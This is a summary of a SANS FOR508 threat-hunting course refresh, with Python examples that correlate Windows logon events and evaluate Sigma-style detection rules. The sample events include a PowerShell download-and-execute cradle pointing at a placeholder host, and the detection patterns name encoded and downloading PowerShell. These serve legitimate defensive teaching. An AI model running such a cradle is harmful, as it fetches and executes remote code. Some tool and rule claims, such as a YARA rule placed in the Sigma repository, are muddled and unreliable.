SANS released the spring refresh of FOR508 last April with one message on every slide: “build the team you already have.” Below is the stripped-down diff—no marketing flyers—just the new labs, free tools and memory-artefact packs that graduates are dropping into production the Monday after class.
- Cloud Hybrid Kill-Chain — Entra ID Added
  - 14-step lab that pivots from on-prem AD → Entra ID → Intune → cloud app
  - Uses the open-source repo `azure-hound-linux` (MIT) to graph permissions without a paid licence
  - Exit exam now includes a hybrid token-replay question; average solve time is 18 min vs 42 min pre-update
- Credential Theft Module — Completely Re-shot
  - Separates authN vs authZ in Windows logs (4624/4625 vs 4672)
  - New attack replay: coercion → relay → delegation abuse in under 90 seconds
  - Students get a YARA rule that hunts for `MS-EVEN6` coercion events; rule pushed to the Sigma GitHub the same week
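The authN/authZ split above is easiest to see as a join: 4624 (logon succeeded) and 4625 (logon failed) tell you who authenticated and from where, while 4672 (special privileges assigned to new logon) tells you what the resulting session was authorised to do. The script below is an added example written for this summary, not FOR508 lab code; the event records are constructed inline in the field names the Security log uses (TargetLogonId, SubjectLogonId, PrivilegeList, LogonType), and the sensitive-privilege list and the machine-account exclusion are assumptions chosen for illustration.

```python
"""Correlate Windows Security 4624/4625 (authentication) with 4672
(authorisation) to find network logons that were handed sensitive rights.

Added example; not FOR508 code. Records are constructed in the shape a
parsed EVTX record commonly takes. Join key: 4624.TargetLogonId is the new
session's ID, and 4672 reports that same ID as SubjectLogonId.
"""
from collections import Counter

# Constructed sample events (not real log data).
SAMPLE_EVENTS = [
    # jdoe authenticates over the network (LogonType 3) ...
    {"EventID": 4624, "TargetLogonId": "0x3E7A1", "TargetUserName": "jdoe",
     "IpAddress": "10.0.0.15", "LogonType": 3},
    # ... and the session is then authorised with debug/backup rights.
    {"EventID": 4672, "SubjectLogonId": "0x3E7A1", "SubjectUserName": "jdoe",
     "PrivilegeList": "SeSecurityPrivilege SeBackupPrivilege SeDebugPrivilege"},
    # asmith logs on interactively; no 4672 follows, so a standard session.
    {"EventID": 4624, "TargetLogonId": "0x3E9C4", "TargetUserName": "asmith",
     "IpAddress": "-", "LogonType": 2},
    # Two failed logons for jdoe from a different host (0xC000006D = bad credentials).
    {"EventID": 4625, "TargetUserName": "jdoe", "IpAddress": "10.0.0.99", "Status": "0xC000006D"},
    {"EventID": 4625, "TargetUserName": "jdoe", "IpAddress": "10.0.0.99", "Status": "0xC000006D"},
    # A machine account: receives privileges constantly, so it is noise here.
    {"EventID": 4624, "TargetLogonId": "0x4A010", "TargetUserName": "WS07$",
     "IpAddress": "10.0.0.5", "LogonType": 3},
    {"EventID": 4672, "SubjectLogonId": "0x4A010", "SubjectUserName": "WS07$",
     "PrivilegeList": "SeAssignPrimaryTokenPrivilege SeTcbPrivilege"},
    # Orphan 4672: its 4624 happened before the collection window started.
    {"EventID": 4672, "SubjectLogonId": "0x00123", "SubjectUserName": "svc_old",
     "PrivilegeList": "SeDebugPrivilege"},
]

# Assumed watch-list of privileges worth alerting on (illustrative, not exhaustive).
SENSITIVE = {"SeDebugPrivilege", "SeTcbPrivilege", "SeBackupPrivilege",
             "SeRestorePrivilege", "SeLoadDriverPrivilege"}


def build_sessions(events):
    """Map each new logon session (from 4624) to the privileges later
    granted to it (from 4672). Sessions with no 4672 keep an empty set."""
    sessions = {}
    for ev in events:
        if ev["EventID"] == 4624:
            sessions[ev["TargetLogonId"]] = {
                "user": ev["TargetUserName"],
                "ip": ev.get("IpAddress", "-"),
                "logon_type": ev["LogonType"],
                "privileges": set(),
            }
    for ev in events:
        if ev["EventID"] == 4672:
            session = sessions.get(ev["SubjectLogonId"])
            if session is None:
                continue  # no matching 4624 in this window; cannot attribute
            session["privileges"].update(ev["PrivilegeList"].split())
    return sessions


def privileged_remote_sessions(events, sensitive=SENSITIVE):
    """Network/RDP logons (LogonType 3 or 10) whose session was authorised
    with at least one sensitive privilege. Machine accounts (names ending
    in '$') are excluded because they legitimately receive these rights."""
    hits = []
    for logon_id, s in build_sessions(events).items():
        if s["user"].endswith("$"):
            continue
        granted = s["privileges"] & sensitive
        if s["logon_type"] in (3, 10) and granted:
            hits.append((logon_id, s["user"], s["ip"], sorted(granted)))
    return hits


def failed_logons_by_source(events):
    """Count 4625 failures per (account, source IP): the authN side."""
    counts = Counter()
    for ev in events:
        if ev["EventID"] == 4625:
            counts[(ev["TargetUserName"], ev.get("IpAddress", "-"))] += 1
    return counts


if __name__ == "__main__":
    for hit in privileged_remote_sessions(SAMPLE_EVENTS):
        print("privileged remote session:", hit)
    for (user, ip), n in failed_logons_by_source(SAMPLE_EVENTS).items():
        print(f"{n} failed logons for {user} from {ip}")
```

Run on real data, the interesting output is not the privileged session by itself but the combination: failures for an account from one host followed by a successful network logon for that account elsewhere that immediately receives SeDebugPrivilege. The orphan 4672 in the sample shows why the join is window-sensitive: pull enough history to contain the 4624, or the grant cannot be attributed to a source address.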
- Lateral Movement — Lesser-Known Roads Added
  - Remote Registry service abuse (disabled by default but still alive on 11 % of 2024 images)
  - DCOM lateral movement via the `ShellWindows` COM object—caught with the Sysmon Event 10 & 1 overlap
  - Lab network is air-gapped; students practice with `impacket-rdp` and `dcomexec.py` against a cloned DC
- Memory Forensics — LOLDrivers & Hibernation
  - Updated acquisition: `winpmem_2025.exe` ships with a signed driver; survives HVCI
  - Hibernation file processing added—useful for laptops found closed at a crime scene
  - Malicious driver hunt uses `lolrivers.txt` (community CSV) tagged to MITRE T1547.008
- Detection Engineering — From IOC to Behaviour
  - Students must write a Sigma rule that fires on behaviour (not a hash) before they can move to the next section; first-attempt failure rate is 34 %—proof of rigour
  - Rule library is contributed back under the MIT licence; 47 rules already merged
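To make the "behaviour, not hash" requirement concrete, the block below evaluates two Sigma-shaped rules over constructed process-creation events: one keyed on a SHA256 IOC, one keyed on parent/child/command-line behaviour with an exclusion filter. It is an added example written for this summary, not the FOR508 rule template and not pySigma; the evaluator implements only the small subset of Sigma semantics the two rules use (`|contains`, `|endswith`, `|contains|all`, and `A and B and not C` conditions), and the rules are expressed as Python dicts in the shape PyYAML would produce from the YAML. All paths, hashes and the deployment-share allow-list are constructed placeholders.

```python
"""Hash IOC rule vs behaviour rule, evaluated with a tiny Sigma-subset matcher.

Added example; not FOR508 or pySigma code. Supports only the modifiers and
condition forms used below; real Sigma is far richer.
"""

# Rules as dicts in the shape a parsed Sigma YAML file takes (constructed).
HASH_RULE = {
    "title": "Known bad PowerShell build (hash IOC)",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {"Hashes|contains": "SHA256=" + "1" * 64},  # placeholder hash
        "condition": "selection",
    },
}

BEHAVIOUR_RULE = {
    "title": "Office spawning encoded or downloading PowerShell (behaviour)",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "ParentImage|endswith": [r"\winword.exe", r"\excel.exe"],
            "Image|endswith": [r"\powershell.exe", r"\pwsh.exe"],
        },
        "selection_args": {
            "CommandLine|contains": ["-enc", "downloadstring", "frombase64string"],
        },
        # Assumed allow-list for a sanctioned deployment share (constructed).
        "filter": {"CommandLine|contains": r"\\corp-share\deploy"},
        "condition": "selection and selection_args and not filter",
    },
}

# Constructed process-creation events (not real telemetry).
EVENTS = [
    {"id": "e1", "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -Enc SQBFAFgA", "Hashes": "SHA256=" + "1" * 64},
    # Same behaviour, different binary build: hash IOC misses, behaviour rule fires.
    {"id": "e2", "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -Enc SQBFAFgA", "Hashes": "SHA256=" + "2" * 64},
    # Different Office app and PowerShell 7, download cradle instead of -Enc.
    {"id": "e3", "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh.exe -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')",
     "Hashes": "SHA256=" + "3" * 64},
    # Encoded PowerShell from Explorer: not the Office parent this rule targets.
    {"id": "e4", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Enc SQBFAFgA", "Hashes": "SHA256=" + "4" * 64},
    # Sanctioned add-in installer launched from the deployment share: filtered out.
    {"id": "e5", "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -Enc SQBFAFgA -File \\corp-share\deploy\addin.ps1",
     "Hashes": "SHA256=" + "5" * 64},
]


def _field_matches(value, modifiers, patterns):
    """Apply one Sigma field test; Sigma string matching is case-insensitive."""
    v = str(value).lower()
    pats = patterns if isinstance(patterns, list) else [patterns]
    pats = [str(p).lower() for p in pats]
    if "contains" in modifiers:
        tests = [p in v for p in pats]
    elif "endswith" in modifiers:
        tests = [v.endswith(p) for p in pats]
    elif "startswith" in modifiers:
        tests = [v.startswith(p) for p in pats]
    else:
        tests = [v == p for p in pats]
    return all(tests) if "all" in modifiers else any(tests)


def _selection_matches(selection, event):
    """Every field in a selection map must match (Sigma ANDs them)."""
    for key, patterns in selection.items():
        field, *modifiers = key.split("|")
        if field not in event or not _field_matches(event[field], modifiers, patterns):
            return False
    return True


def rule_matches(rule, event):
    """Evaluate 'A', 'A and B', 'A and not B' style conditions, left to right."""
    detection = rule["detection"]
    names = {n: _selection_matches(sel, event)
             for n, sel in detection.items() if n != "condition"}
    tokens = detection["condition"].split()
    result, i = names[tokens[0]], 1
    while i < len(tokens):
        op = tokens[i]
        if tokens[i + 1] == "not":
            value, i = (not names[tokens[i + 2]]), i + 3
        else:
            value, i = names[tokens[i + 1]], i + 2
        result = (result and value) if op == "and" else (result or value)
    return result


def evaluate(rules, events):
    """Return {rule title: [event ids that fired]}."""
    return {r["title"]: [e["id"] for e in events if rule_matches(r, e)] for r in rules}


if __name__ == "__main__":
    for title, ids in evaluate([HASH_RULE, BEHAVIOUR_RULE], EVENTS).items():
        print(f"{title}: {ids}")
```

The hash rule fires once and goes silent the moment the binary changes; the behaviour rule fires on three variants it was never tuned for and still excludes the sanctioned deployment path, which is the trade the page's exit gate is enforcing. Before promoting a rule like this to a SIEM, the filter deserves the most scrutiny: an over-broad `contains` allow-list is the usual way a behaviour rule is quietly neutered.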
- Open-Source Pack Released
  - `for508-spring2025-tools` (BSD-3) contains:
    - `hunt-cookbook.pdf`: 60-page tactics quick-reference
    - `evtx-hunter.ps1`: hunts 76 log artefacts in under 2 min on a live system
    - `mem-timeline.py`: builds a 30-day memory timeline from hibernation file + pagefile
- Public Metrics After First 3 Classes (n = 312)
  - Mean exam score: 84 % (up 6 pts)
  - Rule accepted to Sigma repo: 89 % of students
  - Students who report “built internal hunt team within 90 days”: 41 % (up from 22 % in 2024)
- Cost & Access
  - Course remains USD 7,900 list; no new licensing fees
  - Virtual range runs on AWS spot instances; average burn rate is USD 0.80 per lab hour—billed to SANS, not the student
- Quick Start for Alumni Already Holding GCFE/GCFA
  - Download the tool pack above
  - Run `evtx-hunter.ps1` against last month’s domain controller backup
  - Feed the output into the Sigma rule template; push to your SIEM
  - You have just replicated day one of the new course without booking a hotel
Bottom Line
Threat hunting is now an inside job—outsourcing dropped to 30 %. FOR508’s 2025 refresh gives you the playbook, the scripts and the behavioural rules to run the same hunt on Monday morning. Clone the repo, test the scripts, and you can decide later whether the classroom is worth the airfare.